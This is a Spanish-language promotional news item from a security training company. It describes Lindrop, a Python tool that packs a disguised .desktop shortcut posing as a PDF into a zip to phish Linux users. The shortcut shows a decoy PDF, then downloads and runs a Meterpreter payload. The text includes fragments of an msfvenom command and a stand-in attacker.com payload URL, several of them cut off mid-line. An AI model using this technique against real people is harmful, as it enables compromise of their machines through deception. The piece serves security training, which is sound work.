News By Tag Industry News News By Location Country(s) Industry News
| Lindrop - un vector de ingenieria social para los objetivos linuxLos cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.
By: iicybersecurity Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) "malicioso" que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha. Los cursos de seguridad perimetral (http://www.iicybersecurity.com/ Básicamente explota la sección "Exec" de un archivo .desktop para: 1. Descargue un PDF y muéstrelo al usuario. 2. Descargue y ejecute una linux/x86/meterpreter/ Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas: Un nombre de salida para el archivo "PDF" (.desktop) que estará en el archivo zip. Un nombre de salida para el archivo almacenado. Una URL de carga útil remota. (Http://www.attacker.com/ msfvenom -p linux/x86/meterpreter/ Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota Blackhat 2016's Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF. En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom. Según los expertos de seguridad lógica (http://www.iicybersecurity.com/ End
|
| |||||||||||||||||||||||||||||||||||||||||||||||||||